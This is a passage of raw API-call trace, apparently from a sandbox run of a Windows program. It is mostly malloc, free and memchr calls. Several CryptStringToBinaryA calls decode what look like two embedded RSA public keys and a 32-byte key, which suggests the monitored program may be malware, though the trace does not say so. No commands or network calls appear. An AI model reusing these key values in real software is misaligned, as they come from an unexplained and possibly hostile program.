_MaxCount=0xf) returned 0x3d8029d [0188.992] malloc (_Size=0x7) returned 0x3f4c068 [0188.992] free (_Block=0x0) [0188.992] free (_Block=0x0) [0188.992] memchr (_Buf=0x3d8029e, _Val=32, _MaxCount=0x8) returned 0x0 [0188.992] malloc (_Size=0x9) returned 0x3648e90 [0188.992] free (_Block=0x0) [0188.992] free (_Block=0x0) [0188.992] free (_Block=0x3648e18) [0188.992] free (_Block=0x3f4c0c8) [0188.992] free (_Block=0x3f4c068) [0188.992] free (_Block=0x3648e90) [0188.992] free (_Block=0x3e22398) [0188.992] memchr (_Buf=0x3defb30, _Val=32, _MaxCount=0x40) returned 0x0 [0188.992] malloc (_Size=0x41) returned 0x3deff90 [0188.992] free (_Block=0x0) [0188.992] malloc (_Size=0x40) returned 0x3e22620 [0188.992] free (_Block=0x0) [0188.992] free (_Block=0x0) [0188.992] malloc (_Size=0x41) returned 0x3def900 [0188.992] free (_Block=0x0) [0188.992] free (_Block=0x3deff90) [0188.992] free (_Block=0x3e22620) [0188.992] memchr (_Buf=0x3defb80, _Val=32, _MaxCount=0x40) returned 0x0 [0188.992] malloc (_Size=0x41) returned 0x3def9f0 [0188.992] free (_Block=0x0) [0188.993] malloc (_Size=0x40) returned 0x3e22548 [0188.993] free (_Block=0x0) [0188.993] free (_Block=0x0) [0188.993] malloc (_Size=0x81) returned 0x60c6e0 [0188.993] free (_Block=0x3def900) [0188.993] free (_Block=0x3def9f0) [0188.993] free (_Block=0x3e22548) [0188.993] memchr (_Buf=0x3e22308, _Val=32, _MaxCount=0x3c) returned 0x0 [0188.993] malloc (_Size=0x3d) returned 0x3e22548 [0188.993] free (_Block=0x0) [0188.993] malloc (_Size=0x40) returned 0x3e224b8 [0188.993] free (_Block=0x0) [0188.993] free (_Block=0x0) [0188.993] malloc (_Size=0xc1) returned 0x3691f90 [0188.993] free (_Block=0x60c6e0) [0188.993] free (_Block=0x3e22548) [0188.993] free (_Block=0x3e224b8) [0188.993] memchr (_Buf=0x3d80350, _Val=32, _MaxCount=0x1c) returned 0x3d80358 [0188.993] malloc (_Size=0x9) returned 0x3648f20 [0188.993] free (_Block=0x0) [0188.993] malloc (_Size=0x40) returned 0x3e225d8 [0188.993] free (_Block=0x0) [0188.993] free (_Block=0x0) [0188.993] memchr (_Buf=0x3d80359, _Val=32, _MaxCount=0x13) returned 0x3d8035c [0188.993] malloc (_Size=0x4) returned 0x3f4bf78 [0188.993] free (_Block=0x0) [0188.993] free (_Block=0x0) [0188.993] memchr (_Buf=0x3d8035d, _Val=32, _MaxCount=0xf) returned 0x3d80363 [0188.993] malloc (_Size=0x7) returned 0x3f4c028 [0188.994] free (_Block=0x0) [0188.994] free (_Block=0x0) [0188.994] memchr (_Buf=0x3d80364, _Val=32, _MaxCount=0x8) returned 0x0 [0188.994] malloc (_Size=0x9) returned 0x3648f38 [0188.994] free (_Block=0x0) [0188.994] free (_Block=0x0) [0188.994] CryptStringToBinaryA (in: pszString="MIGJAoGBAOgXkCLp9hlEmk5oqG7+EvDdDldPuLkMfKpPJBHMCZrtPVaLDm2GK2x5gdF/AboMh1qDIJNeBj7UURfqDef/ev99XETbOmE043aSpZW036yERt/q5ihg8GkA66paGDMFCc7sIHOzmovSW6BCxjdzzpy8MhQtLuFNZ4veZiMujWkdAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f3c8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f3c8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0188.994] malloc (_Size=0x8c) returned 0x3d9ed08 [0188.994] free (_Block=0x0) [0188.994] CryptStringToBinaryA (in: pszString="MIGJAoGBAOgXkCLp9hlEmk5oqG7+EvDdDldPuLkMfKpPJBHMCZrtPVaLDm2GK2x5gdF/AboMh1qDIJNeBj7UURfqDef/ev99XETbOmE043aSpZW036yERt/q5ihg8GkA66paGDMFCc7sIHOzmovSW6BCxjdzzpy8MhQtLuFNZ4veZiMujWkdAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x3d9ed08, pcbBinary=0x316f3c8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d9ed08, pcbBinary=0x316f3c8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0188.994] malloc (_Size=0x8c) returned 0x3d9ee38 [0188.994] free (_Block=0x0) [0188.994] free (_Block=0x0) [0188.994] free (_Block=0x3d9ed08) [0188.994] free (_Block=0x3648f20) [0188.994] free (_Block=0x3f4bf78) [0188.994] free (_Block=0x3f4c028) [0188.994] free (_Block=0x3648f38) [0188.994] free (_Block=0x3e225d8) [0188.994] memchr (_Buf=0x3648d28, _Val=32, _MaxCount=0xb) returned 0x0 [0188.994] malloc (_Size=0xc) returned 0x3648de8 [0188.994] free (_Block=0x0) [0188.994] malloc (_Size=0x40) returned 0x3e221e8 [0188.994] free (_Block=0x0) [0188.994] free (_Block=0x0) [0188.994] free (_Block=0x3648de8) [0188.994] free (_Block=0x3e221e8) [0188.995] memchr (_Buf=0x3d80080, _Val=32, _MaxCount=0x1e) returned 0x3d8008a [0188.995] malloc (_Size=0xb) returned 0x3648de8 [0188.995] free (_Block=0x0) [0188.995] malloc (_Size=0x40) returned 0x3e221e8 [0188.995] free (_Block=0x0) [0188.995] free (_Block=0x0) [0188.995] memchr (_Buf=0x3d8008b, _Val=32, _MaxCount=0x13) returned 0x3d8008e [0188.995] malloc (_Size=0x4) returned 0x3f4bf48 [0188.995] free (_Block=0x0) [0188.995] free (_Block=0x0) [0188.995] memchr (_Buf=0x3d8008f, _Val=32, _MaxCount=0xf) returned 0x3d80095 [0188.995] malloc (_Size=0x7) returned 0x3f4c078 [0188.995] free (_Block=0x0) [0188.995] free (_Block=0x0) [0188.995] memchr (_Buf=0x3d80096, _Val=32, _MaxCount=0x8) returned 0x0 [0188.995] malloc (_Size=0x9) returned 0x3648d10 [0188.995] free (_Block=0x0) [0188.995] free (_Block=0x0) [0188.995] free (_Block=0x3648de8) [0188.995] free (_Block=0x3f4bf48) [0188.995] free (_Block=0x3f4c078) [0188.995] free (_Block=0x3648d10) [0188.995] free (_Block=0x3e221e8) [0188.995] memchr (_Buf=0x3def9a0, _Val=32, _MaxCount=0x40) returned 0x0 [0188.995] malloc (_Size=0x41) returned 0x3def900 [0188.995] free (_Block=0x0) [0188.995] malloc (_Size=0x40) returned 0x3e227d0 [0188.996] free (_Block=0x0) [0188.996] free (_Block=0x0) [0188.996] free (_Block=0x3def900) [0188.996] free (_Block=0x3e227d0) [0188.996] memchr (_Buf=0x3defc70, _Val=32, _MaxCount=0x40) returned 0x0 [0188.996] malloc (_Size=0x41) returned 0x3def9f0 [0188.996] free (_Block=0x0) [0188.996] malloc (_Size=0x40) returned 0x3e22398 [0188.996] free (_Block=0x0) [0188.996] free (_Block=0x0) [0188.996] free (_Block=0x3def9f0) [0188.996] free (_Block=0x3e22398) [0188.996] memchr (_Buf=0x3e22740, _Val=32, _MaxCount=0x3c) returned 0x0 [0188.996] malloc (_Size=0x3d) returned 0x3e22620 [0188.996] free (_Block=0x0) [0188.996] malloc (_Size=0x40) returned 0x3e22038 [0188.996] free (_Block=0x0) [0188.996] free (_Block=0x0) [0188.996] free (_Block=0x3e22620) [0188.996] free (_Block=0x3e22038) [0188.996] memchr (_Buf=0x3d802b0, _Val=32, _MaxCount=0x1c) returned 0x3d802b8 [0188.996] malloc (_Size=0x9) returned 0x3648dd0 [0188.996] free (_Block=0x0) [0188.996] malloc (_Size=0x40) returned 0x3e22398 [0188.997] free (_Block=0x0) [0188.997] free (_Block=0x0) [0188.997] memchr (_Buf=0x3d802b9, _Val=32, _MaxCount=0x13) returned 0x3d802bc [0188.997] malloc (_Size=0x4) returned 0x3f4bf58 [0188.997] free (_Block=0x0) [0188.997] free (_Block=0x0) [0188.997] memchr (_Buf=0x3d802bd, _Val=32, _MaxCount=0xf) returned 0x3d802c3 [0188.997] malloc (_Size=0x7) returned 0x3f4bfd8 [0188.997] free (_Block=0x0) [0188.997] free (_Block=0x0) [0188.997] memchr (_Buf=0x3d802c4, _Val=32, _MaxCount=0x8) returned 0x0 [0188.997] malloc (_Size=0x9) returned 0x3648e18 [0188.997] free (_Block=0x0) [0188.997] free (_Block=0x0) [0188.997] CryptStringToBinaryA (in: pszString="MIGJAoGBALxHT7+9UsqpC7Kbuj2PStkXJC/irxnjqRa3CpLoSP4g8RUo/yKbh+Sb1tIBRC/cvHnK+dzTteY0znYHBbhKb1hKLpPsR4Y/WES086XzfE0hptc2Wmy8oFwuGDUaJiVuIC7t04y3scb5TyVIU5U47RMvSfCpDYI45+aCNA+BJHzTAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f3c8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f3c8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0188.997] malloc (_Size=0x8c) returned 0x3d9e718 [0188.997] free (_Block=0x0) [0188.997] CryptStringToBinaryA (in: pszString="MIGJAoGBALxHT7+9UsqpC7Kbuj2PStkXJC/irxnjqRa3CpLoSP4g8RUo/yKbh+Sb1tIBRC/cvHnK+dzTteY0znYHBbhKb1hKLpPsR4Y/WES086XzfE0hptc2Wmy8oFwuGDUaJiVuIC7t04y3scb5TyVIU5U47RMvSfCpDYI45+aCNA+BJHzTAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x3d9e718, pcbBinary=0x316f3c8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d9e718, pcbBinary=0x316f3c8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0188.997] malloc (_Size=0x8c) returned 0x3d9f1c8 [0188.997] free (_Block=0x0) [0188.997] free (_Block=0x0) [0188.997] free (_Block=0x3d9e718) [0188.997] free (_Block=0x3648dd0) [0188.997] free (_Block=0x3f4bf58) [0188.997] free (_Block=0x3f4bfd8) [0188.997] free (_Block=0x3648e18) [0188.998] free (_Block=0x3e22398) [0188.998] memchr (_Buf=0x3f653e0, _Val=32, _MaxCount=0x13) returned 0x0 [0188.998] malloc (_Size=0x14) returned 0x3f65480 [0188.998] free (_Block=0x0) [0188.998] malloc (_Size=0x40) returned 0x3e22278 [0188.998] free (_Block=0x0) [0188.998] free (_Block=0x0) [0188.998] free (_Block=0x3f65480) [0188.998] free (_Block=0x3e22278) [0188.998] memchr (_Buf=0x3d803c8, _Val=32, _MaxCount=0x19) returned 0x3d803d2 [0188.998] malloc (_Size=0xb) returned 0x3648d10 [0188.998] free (_Block=0x0) [0188.998] malloc (_Size=0x40) returned 0x3e22668 [0188.998] free (_Block=0x0) [0188.998] free (_Block=0x0) [0188.998] memchr (_Buf=0x3d803d3, _Val=32, _MaxCount=0xe) returned 0x0 [0188.998] malloc (_Size=0xf) returned 0x3648d58 [0188.998] free (_Block=0x0) [0188.998] free (_Block=0x0) [0188.998] free (_Block=0x3648d10) [0188.998] free (_Block=0x3648d58) [0188.998] free (_Block=0x3e22668) [0188.998] memchr (_Buf=0x3def950, _Val=32, _MaxCount=0x40) returned 0x0 [0188.998] malloc (_Size=0x41) returned 0x3defae0 [0188.998] free (_Block=0x0) [0188.998] malloc (_Size=0x40) returned 0x3e22398 [0188.998] free (_Block=0x0) [0188.998] free (_Block=0x0) [0188.998] free (_Block=0x3defae0) [0188.998] free (_Block=0x3e22398) [0188.999] memchr (_Buf=0x3defa90, _Val=32, _MaxCount=0x40) returned 0x0 [0188.999] malloc (_Size=0x41) returned 0x3def900 [0188.999] free (_Block=0x0) [0188.999] malloc (_Size=0x40) returned 0x3e22038 [0188.999] free (_Block=0x0) [0188.999] free (_Block=0x0) [0188.999] free (_Block=0x3def900) [0188.999] free (_Block=0x3e22038) [0188.999] memchr (_Buf=0x3624a68, _Val=32, _MaxCount=0x2c) returned 0x0 [0188.999] malloc (_Size=0x2d) returned 0x3624a30 [0188.999] free (_Block=0x0) [0188.999] malloc (_Size=0x40) returned 0x3e22668 [0188.999] free (_Block=0x0) [0188.999] free (_Block=0x0) [0188.999] free (_Block=0x3624a30) [0188.999] free (_Block=0x3e22668) [0188.999] memchr (_Buf=0x3f652c0, _Val=32, _MaxCount=0x17) returned 0x3f652c8 [0188.999] malloc (_Size=0x9) returned 0x3648e90 [0188.999] free (_Block=0x0) [0188.999] malloc (_Size=0x40) returned 0x3e22230 [0188.999] free (_Block=0x0) [0188.999] free (_Block=0x0) [0188.999] memchr (_Buf=0x3f652c9, _Val=32, _MaxCount=0xe) returned 0x0 [0188.999] malloc (_Size=0xf) returned 0x3648de8 [0188.999] free (_Block=0x0) [0188.999] free (_Block=0x0) [0188.999] free (_Block=0x3648e90) [0188.999] free (_Block=0x3648de8) [0188.999] free (_Block=0x3e22230) [0188.999] memchr (_Buf=0x3d801e8, _Val=32, _MaxCount=0x1a) returned 0x3d80200 [0188.999] malloc (_Size=0x19) returned 0x3d80198 [0189.000] free (_Block=0x0) [0189.000] malloc (_Size=0x40) returned 0x3e22080 [0189.000] free (_Block=0x0) [0189.000] free (_Block=0x0) [0189.000] memchr (_Buf=0x3d80201, _Val=32, _MaxCount=0x1) returned 0x0 [0189.000] malloc (_Size=0x2) returned 0x3f4bf18 [0189.000] free (_Block=0x0) [0189.000] free (_Block=0x0) [0189.000] free (_Block=0x3d80198) [0189.000] free (_Block=0x3f4bf18) [0189.000] free (_Block=0x3e22080) [0189.000] memchr (_Buf=0x3d80120, _Val=32, _MaxCount=0x1c) returned 0x3d8012a [0189.000] malloc (_Size=0xb) returned 0x3648ce0 [0189.000] free (_Block=0x0) [0189.000] malloc (_Size=0x40) returned 0x3e22230 [0189.000] free (_Block=0x0) [0189.000] free (_Block=0x0) [0189.000] memchr (_Buf=0x3d8012b, _Val=32, _MaxCount=0x11) returned 0x3d80132 [0189.000] malloc (_Size=0x8) returned 0x3f4bfc8 [0189.000] free (_Block=0x0) [0189.000] free (_Block=0x0) [0189.000] memchr (_Buf=0x3d80133, _Val=32, _MaxCount=0x9) returned 0x0 [0189.000] malloc (_Size=0xa) returned 0x3648e90 [0189.000] free (_Block=0x0) [0189.000] free (_Block=0x0) [0189.000] free (_Block=0x3648ce0) [0189.000] free (_Block=0x3f4bfc8) [0189.000] free (_Block=0x3648e90) [0189.000] free (_Block=0x3e22230) [0189.000] memchr (_Buf=0x3defef0, _Val=32, _MaxCount=0x40) returned 0x0 [0189.001] malloc (_Size=0x41) returned 0x3defcc0 [0189.001] free (_Block=0x0) [0189.001] malloc (_Size=0x40) returned 0x3e22230 [0189.001] free (_Block=0x0) [0189.001] free (_Block=0x0) [0189.001] free (_Block=0x3defcc0) [0189.001] free (_Block=0x3e22230) [0189.001] memchr (_Buf=0x3df0080, _Val=32, _MaxCount=0x40) returned 0x0 [0189.001] malloc (_Size=0x41) returned 0x3def900 [0189.001] free (_Block=0x0) [0189.001] malloc (_Size=0x40) returned 0x3e22080 [0189.001] free (_Block=0x0) [0189.001] free (_Block=0x0) [0189.001] free (_Block=0x3def900) [0189.001] free (_Block=0x3e22080) [0189.001] memchr (_Buf=0x3648e60, _Val=32, _MaxCount=0xc) returned 0x0 [0189.001] malloc (_Size=0xd) returned 0x3648ed8 [0189.001] free (_Block=0x0) [0189.001] malloc (_Size=0x40) returned 0x3e221e8 [0189.001] free (_Block=0x0) [0189.001] free (_Block=0x0) [0189.001] free (_Block=0x3648ed8) [0189.001] free (_Block=0x3e221e8) [0189.001] memchr (_Buf=0x3d80238, _Val=32, _MaxCount=0x1a) returned 0x3d80240 [0189.001] malloc (_Size=0x9) returned 0x3648d10 [0189.001] free (_Block=0x0) [0189.001] malloc (_Size=0x40) returned 0x3e22110 [0189.001] free (_Block=0x0) [0189.001] free (_Block=0x0) [0189.001] memchr (_Buf=0x3d80241, _Val=32, _MaxCount=0x11) returned 0x3d80248 [0189.002] malloc (_Size=0x8) returned 0x3f4c0d8 [0189.002] free (_Block=0x0) [0189.002] free (_Block=0x0) [0189.002] memchr (_Buf=0x3d80249, _Val=32, _MaxCount=0x9) returned 0x0 [0189.002] malloc (_Size=0xa) returned 0x3648dd0 [0189.002] free (_Block=0x0) [0189.002] free (_Block=0x0) [0189.002] free (_Block=0x3648d10) [0189.002] free (_Block=0x3f4c0d8) [0189.002] free (_Block=0x3648dd0) [0189.002] free (_Block=0x3e22110) [0189.002] memchr (_Buf=0x3def010, _Val=32, _MaxCount=0x420) returned 0x3def016 [0189.002] malloc (_Size=0x7) returned 0x3f4bf28 [0189.002] free (_Block=0x0) [0189.002] malloc (_Size=0x40) returned 0x3e22668 [0189.002] free (_Block=0x0) [0189.002] free (_Block=0x0) [0189.002] memchr (_Buf=0x3def017, _Val=32, _MaxCount=0x419) returned 0x3def040 [0189.002] malloc (_Size=0x2a) returned 0x3624838 [0189.002] free (_Block=0x0) [0189.002] free (_Block=0x0) [0189.002] memchr (_Buf=0x3def041, _Val=32, _MaxCount=0x3ef) returned 0x3def06a [0189.002] malloc (_Size=0x2a) returned 0x3624950 [0189.002] free (_Block=0x0) [0189.002] free (_Block=0x0) [0189.002] memchr (_Buf=0x3def06b, _Val=32, _MaxCount=0x3c5) returned 0x3def094 [0189.002] malloc (_Size=0x2a) returned 0x3624b48 [0189.002] free (_Block=0x0) [0189.002] free (_Block=0x0) [0189.002] memchr (_Buf=0x3def095, _Val=32, _MaxCount=0x39b) returned 0x3def0be [0189.002] malloc (_Size=0x2a) returned 0x3624b80 [0189.003] free (_Block=0x0) [0189.003] malloc (_Size=0x140) returned 0x3dd4128 [0189.003] free (_Block=0x3e22668) [0189.003] free (_Block=0x0) [0189.003] memchr (_Buf=0x3def0bf, _Val=32, _MaxCount=0x371) returned 0x3def0e8 [0189.003] malloc (_Size=0x2a) returned 0x3624988 [0189.003] free (_Block=0x0) [0189.003] free (_Block=0x0) [0189.003] memchr (_Buf=0x3def0e9, _Val=32, _MaxCount=0x347) returned 0x3def112 [0189.003] malloc (_Size=0x2a) returned 0x36249c0 [0189.003] free (_Block=0x0) [0189.003] free (_Block=0x0) [0189.003] memchr (_Buf=0x3def113, _Val=32, _MaxCount=0x31d) returned 0x3def13c [0189.003] malloc (_Size=0x2a) returned 0x3624bb8 [0189.003] free (_Block=0x0) [0189.003] free (_Block=0x0) [0189.003] memchr (_Buf=0x3def13d, _Val=32, _MaxCount=0x2f3) returned 0x3def166 [0189.003] malloc (_Size=0x2a) returned 0x3624870 [0189.003] free (_Block=0x0) [0189.003] free (_Block=0x0) [0189.003] memchr (_Buf=0x3def167, _Val=32, _MaxCount=0x2c9) returned 0x3def190 [0189.003] malloc (_Size=0x2a) returned 0x36249f8 [0189.003] free (_Block=0x0) [0189.003] free (_Block=0x0) [0189.003] memchr (_Buf=0x3def191, _Val=32, _MaxCount=0x29f) returned 0x3def1ba [0189.003] malloc (_Size=0x2a) returned 0x36248a8 [0189.003] free (_Block=0x0) [0189.003] free (_Block=0x0) [0189.003] memchr (_Buf=0x3def1bb, _Val=32, _MaxCount=0x275) returned 0x3def1e4 [0189.004] malloc (_Size=0x2a) returned 0x3624918 [0189.004] free (_Block=0x0) [0189.004] free (_Block=0x0) [0189.004] memchr (_Buf=0x3def1e5, _Val=32, _MaxCount=0x24b) returned 0x3def20e [0189.004] malloc (_Size=0x2a) returned 0x3624a30 [0189.004] free (_Block=0x0) [0189.004] free (_Block=0x0) [0189.004] memchr (_Buf=0x3def20f, _Val=32, _MaxCount=0x221) returned 0x3def238 [0189.004] malloc (_Size=0x2a) returned 0x3624aa0 [0189.004] free (_Block=0x0) [0189.004] free (_Block=0x0) [0189.004] memchr (_Buf=0x3def239, _Val=32, _MaxCount=0x1f7) returned 0x3def262 [0189.004] malloc (_Size=0x2a) returned 0x3f685b8 [0189.004] free (_Block=0x0) [0189.004] free (_Block=0x0) [0189.004] memchr (_Buf=0x3def263, _Val=32, _MaxCount=0x1cd) returned 0x3def28c [0189.004] malloc (_Size=0x2a) returned 0x3f680e8 [0189.004] free (_Block=0x0) [0189.004] free (_Block=0x0) [0189.004] memchr (_Buf=0x3def28d, _Val=32, _MaxCount=0x1a3) returned 0x3def2b6 [0189.004] malloc (_Size=0x2a) returned 0x3f683f8 [0189.004] free (_Block=0x0) [0189.004] free (_Block=0x0) [0189.004] memchr (_Buf=0x3def2b7, _Val=32, _MaxCount=0x179) returned 0x3def2e0 [0189.004] malloc (_Size=0x2a) returned 0x3f685f0 [0189.004] free (_Block=0x0) [0189.004] free (_Block=0x0) [0189.004] memchr (_Buf=0x3def2e1, _Val=32, _MaxCount=0x14f) returned 0x3def30a [0189.004] malloc (_Size=0x2a) returned 0x3f68698 [0189.005] free (_Block=0x0) [0189.005] free (_Block=0x0) [0189.005] memchr (_Buf=0x3def30b, _Val=32, _MaxCount=0x125) returned 0x3def334 [0189.005] malloc (_Size=0x2a) returned 0x3f682e0 [0189.005] free (_Block=0x0) [0189.005] free (_Block=0x0) [0189.005] memchr (_Buf=0x3def335, _Val=32, _MaxCount=0xfb) returned 0x3def35e [0189.005] malloc (_Size=0x2a) returned 0x3f68580 [0189.005] free (_Block=0x0) [0189.005] malloc (_Size=0x540) returned 0x60cdc0 [0189.005] free (_Block=0x3dd4128) [0189.005] free (_Block=0x0) [0189.005] memchr (_Buf=0x3def35f, _Val=32, _MaxCount=0xd1) returned 0x3def388 [0189.005] malloc (_Size=0x2a) returned 0x3f68158 [0189.005] free (_Block=0x0) [0189.005] free (_Block=0x0) [0189.005] memchr (_Buf=0x3def389, _Val=32, _MaxCount=0xa7) returned 0x3def3b2 [0189.005] malloc (_Size=0x2a) returned 0x3f68350 [0189.005] free (_Block=0x0) [0189.005] free (_Block=0x0) [0189.005] memchr (_Buf=0x3def3b3, _Val=32, _MaxCount=0x7d) returned 0x3def3dc [0189.005] malloc (_Size=0x2a) returned 0x3f68120 [0189.005] free (_Block=0x0) [0189.005] free (_Block=0x0) [0189.005] memchr (_Buf=0x3def3dd, _Val=32, _MaxCount=0x53) returned 0x3def406 [0189.005] malloc (_Size=0x2a) returned 0x3f68190 [0189.005] free (_Block=0x0) [0189.006] free (_Block=0x0) [0189.006] memchr (_Buf=0x3def407, _Val=32, _MaxCount=0x29) returned 0x0 [0189.006] malloc (_Size=0x2a) returned 0x3f680b0 [0189.006] free (_Block=0x0) [0189.006] free (_Block=0x0) [0189.006] free (_Block=0x3f4bf28) [0189.006] free (_Block=0x3624838) [0189.006] free (_Block=0x3624950) [0189.006] free (_Block=0x3624b48) [0189.006] free (_Block=0x3624b80) [0189.006] free (_Block=0x3624988) [0189.006] free (_Block=0x36249c0) [0189.006] free (_Block=0x3624bb8) [0189.006] free (_Block=0x3624870) [0189.006] free (_Block=0x36249f8) [0189.006] free (_Block=0x36248a8) [0189.006] free (_Block=0x3624918) [0189.006] free (_Block=0x3624a30) [0189.006] free (_Block=0x3624aa0) [0189.006] free (_Block=0x3f685b8) [0189.006] free (_Block=0x3f680e8) [0189.006] free (_Block=0x3f683f8) [0189.006] free (_Block=0x3f685f0) [0189.006] free (_Block=0x3f68698) [0189.006] free (_Block=0x3f682e0) [0189.006] free (_Block=0x3f68580) [0189.006] free (_Block=0x3f68158) [0189.006] free (_Block=0x3f68350) [0189.007] free (_Block=0x3f68120) [0189.007] free (_Block=0x3f68190) [0189.007] free (_Block=0x3f680b0) [0189.007] free (_Block=0x60cdc0) [0189.007] memchr (_Buf=0x3f654c0, _Val=32, _MaxCount=0x12) returned 0x0 [0189.007] malloc (_Size=0x13) returned 0x3f65520 [0189.007] free (_Block=0x0) [0189.007] malloc (_Size=0x40) returned 0x3e22788 [0189.007] free (_Block=0x0) [0189.007] free (_Block=0x0) [0189.007] free (_Block=0x3f65520) [0189.007] free (_Block=0x3e22788) [0189.007] memchr (_Buf=0x3624ad8, _Val=32, _MaxCount=0x2f) returned 0x3624adf [0189.007] malloc (_Size=0x8) returned 0x3f4bfc8 [0189.007] free (_Block=0x0) [0189.007] malloc (_Size=0x40) returned 0x3e22398 [0189.007] free (_Block=0x0) [0189.007] free (_Block=0x0) [0189.007] memchr (_Buf=0x3624ae0, _Val=32, _MaxCount=0x27) returned 0x3624ae5 [0189.007] malloc (_Size=0x6) returned 0x3f4c0b8 [0189.007] free (_Block=0x0) [0189.007] free (_Block=0x0) [0189.007] memchr (_Buf=0x3624ae6, _Val=32, _MaxCount=0x21) returned 0x3624aee [0189.007] malloc (_Size=0x9) returned 0x3648e30 [0189.007] free (_Block=0x0) [0189.007] free (_Block=0x0) [0189.007] memchr (_Buf=0x3624aef, _Val=32, _MaxCount=0x18) returned 0x3624af1 [0189.007] malloc (_Size=0x3) returned 0x3f4bfd8 [0189.007] free (_Block=0x0) [0189.008] free (_Block=0x0) [0189.008] memchr (_Buf=0x3624af2, _Val=32, _MaxCount=0x15) returned 0x3624aff [0189.008] malloc (_Size=0xe) returned 0x3648e90 [0189.008] free (_Block=0x0) [0189.008] malloc (_Size=0x140) returned 0x3dd43b8 [0189.008] free (_Block=0x3e22398) [0189.008] free (_Block=0x0) [0189.008] memchr (_Buf=0x3624b00, _Val=32, _MaxCount=0x7) returned 0x3624b03 [0189.008] malloc (_Size=0x4) returned 0x3f4bf78 [0189.008] free (_Block=0x0) [0189.008] free (_Block=0x0) [0189.008] memchr (_Buf=0x3624b04, _Val=32, _MaxCount=0x3) returned 0x0 [0189.008] malloc (_Size=0x4) returned 0x3f4bf88 [0189.008] free (_Block=0x0) [0189.008] free (_Block=0x0) [0189.008] free (_Block=0x3f4bfc8) [0189.008] free (_Block=0x3f4c0b8) [0189.008] free (_Block=0x3648e30) [0189.008] free (_Block=0x3f4bfd8) [0189.008] free (_Block=0x3648e90) [0189.008] free (_Block=0x3f4bf78) [0189.008] free (_Block=0x3f4bf88) [0189.008] free (_Block=0x3dd43b8) [0189.008] memchr (_Buf=0x3e22350, _Val=32, _MaxCount=0x3b) returned 0x3e2235e [0189.008] malloc (_Size=0xf) returned 0x3648d70 [0189.008] free (_Block=0x0) [0189.008] malloc (_Size=0x40) returned 0x3e223e0 [0189.008] free (_Block=0x0) [0189.009] free (_Block=0x0) [0189.009] memchr (_Buf=0x3e2235f, _Val=32, _MaxCount=0x2c) returned 0x0 [0189.009] malloc (_Size=0x2d) returned 0x3624988 [0189.009] free (_Block=0x0) [0189.009] free (_Block=0x0) [0189.009] CryptStringToBinaryA (in: pszString="R2Em4FLH5cuwNyWOX65gpTV9hcvPJMRD7U6wIIVnGXE=", cchString=0x2c, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f3c8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f3c8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0189.009] malloc (_Size=0x20) returned 0x3d802d8 [0189.009] free (_Block=0x0) [0189.009] CryptStringToBinaryA (in: pszString="R2Em4FLH5cuwNyWOX65gpTV9hcvPJMRD7U6wIIVnGXE=", cchString=0x2c, dwFlags=0x6, pbBinary=0x3d802d8, pcbBinary=0x316f3c8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d802d8, pcbBinary=0x316f3c8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0189.009] malloc (_Size=0x20) returned 0x3d803f0 [0189.009] free (_Block=0x0) [0189.009] free (_Block=0x0) [0189.009] free (_Block=0x3d802d8) [0189.009] free (_Block=0x3648d70) [0189.009] free (_Block=0x3624988) [0189.009] free (_Block=0x3e223e0) [0189.009] memchr (_Buf=0x3648ec0, _Val=32, _MaxCount=0xa) returned 0x3648ec6 [0189.009] malloc (_Size=0x7) returned 0x3f4bfa8 [0189.009] free (_Block=0x0) [0189.009] malloc (_Size=0x40) returned 0x3e22278 [0189.009] free (_Block=0x0) [0189.009] free (_Block=0x0) [0189.009] memchr (_Buf=0x3648ec7, _Val=32, _MaxCount=0x3) returned 0x0 [0189.009] malloc (_Size=0x4) returned 0x3f4c098 [0189.009] free (_Block=0x0) [0189.009] free (_Block=0x0) [0189.009] free (_Block=0x3f4bfa8) [0189.010] free (_Block=0x3f4c098) [0189.010] free (_Block=0x3e22278) [0189.010] memchr (_Buf=0x3f65340, _Val=32, _MaxCount=0x14) returned 0x0 [0189.010] malloc (_Size=0x15) returned 0x3f65360 [0189.010] free (_Block=0x0) [0189.010] malloc (_Size=0x40) returned 0x3e224b8 [0189.010] free (_Block=0x0) [0189.010] free (_Block=0x0) [0189.010] free (_Block=0x3f65360) [0189.010] free (_Block=0x3e224b8) [0189.010] memchr (_Buf=0x60b740, _Val=32, _MaxCount=0x69) returned 0x60b752 [0189.010] malloc (_Size=0x13) returned 0x3f65360 [0189.010] free (_Block=0x0) [0189.010] malloc (_Size=0x40) returned 0x3e22398 [0189.010] free (_Block=0x0) [0189.010] free (_Block=0x0) [0189.010] memchr (_Buf=0x60b753, _Val=32, _MaxCount=0x56) returned 0x0 [0189.010] malloc (_Size=0x57) returned 0x3df0610 [0189.010] free (_Block=0x0) [0189.010] free (_Block=0x0) [0189.010] free (_Block=0x3f65360) [0189.010] free (_Block=0x3df0610) [0189.010] free (_Block=0x3e22398) [0189.010] memchr (_Buf=0x3f654e0, _Val=32, _MaxCount=0x10) returned 0x0 [0189.010] malloc (_Size=0x11) returned 0x3f65500 [0189.010] free (_Block=0x0) [0189.010] malloc (_Size=0x40) returned 0x3e22230 [0189.010] free (_Block=0x0) [0189.010] free (_Block=0x0) [0189.011] free (_Block=0x3f65500) [0189.011] free (_Block=0x3e22230) [0189.011] memchr (_Buf=0x3d800d0, _Val=32, _MaxCount=0x19) returned 0x3d800da [0189.011] malloc (_Size=0xb) returned 0x3648ce0 [0189.011] free (_Block=0x0) [0189.011] malloc (_Size=0x40) returned 0x3e221e8 [0189.011] free 